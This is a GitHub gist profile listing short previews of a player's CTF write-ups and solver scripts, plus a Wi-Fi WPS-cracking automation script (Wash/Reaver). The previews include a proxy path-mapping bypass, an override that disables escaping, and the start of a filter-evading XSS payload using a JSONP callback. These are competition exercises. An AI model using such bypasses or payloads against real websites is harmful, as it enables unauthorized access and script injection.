Skip to content

Instantly share code, notes, and snippets.

View jorgectf's full-sized avatar
🎯
Focusing

Jorge jorgectf

🎯
Focusing
View GitHub Profile
@jorgectf
jorgectf / LINE CTF 2022 - title todo.md
Last active July 5, 2023 08:59
LINE CTF 2022 - title todo
@jorgectf
jorgectf / TSJ_CTF_2022_NimjaAtNantou.md
Last active March 26, 2022 17:26
TSJ CTF 2022 - Nimja at Nantou solution

Nimja at Nantou

map /hello-from-the-world/key http://127.0.0.1:80/forbidden
map /hello-from-the-world/    http://127.0.0.1:80
map /service-info/admin       http://127.0.0.1:5000/forbidden
map /service-info/            http://127.0.0.1:5000/

Mapping /hello-from-the-world/ to http://127.0.0.1:80 (without the last slash) makes /hello-from-the-world//key not to match the first rule but provides a valid path to the second rule. This let us get the key:

@jorgectf
jorgectf / intigriti-xss-10-2021.md
Last active November 21, 2021 22:29
Intigriti's October 2021 XSS challenge writeup.

TL;DR

This month's challenge consists of the exploitiation of a custom js code hosted on a document with a Halloween style. In overview we'll be injecting JS inside a <script> tag (thanks to an interesting detail in the CSP) that was previously injected into a document's div's innerHTML.

The solution of this challenge has been found in collaboration with @carlospolopm.

Initial approach

imagen

@jorgectf
jorgectf / sync_discord_bot.py
Created August 28, 2021 19:36
Synchronized Discord bot in Python 3.
from discord import Client, CategoryChannel
import discord.utils
from time import sleep
import threading
import asyncio
import os
class Bot(Client):
guild = None
guild_id = os.getenv("DISCORD_GUILD_ID", None)
@jorgectf
jorgectf / washXreaver.sh
Last active August 14, 2021 22:37 — forked from iGh0st/d4rk-r34v3r.sh
Wash and Reaver automation script.
#!/bin/bash
if [ "$#" -ne 1 ]; then
echo "Illegal number of parameters"
echo "./{} INTERFACE"
fi
interface=$1
if (( EUID != 0 )); then
@jorgectf
jorgectf / LineCTF_2021_Your-Notes.py
Last active March 21, 2021 01:41
Line's CTF Your Notes solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess
def random_string(length):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
@jorgectf
jorgectf / NahamConCTF_2021_AgentTester.py
Last active March 15, 2021 15:01
NahamCon CTF's AgentTester solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string
import requests
def random_string(length):
@jorgectf
jorgectf / AeroCTF_2021_Not-received-points.md
Last active March 1, 2021 10:45
AeroCTF 2021's "Not received points" solution.

Void _.escape

// this made empty the client-side func that escaped our input
_.escape = function(s) {return s}

Leak flag image uri

// XSS through JSONP from accounts.google.com
<scr<script>ipt src="https://accounts.google.com/o/oauth2/revoke?callback=(function(){
@jorgectf
jorgectf / CybexCTF_2021_WaloW3b.html
Last active February 15, 2021 15:18
CybexCTF 2021's WaloW3b solver.
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<script>
const localURL = "https://127.0.0.1:4000"
@jorgectf
jorgectf / DefCamp_2020.md
Last active November 22, 2021 18:34
Solution for some DefCamp 2020 CTF's Web challenges.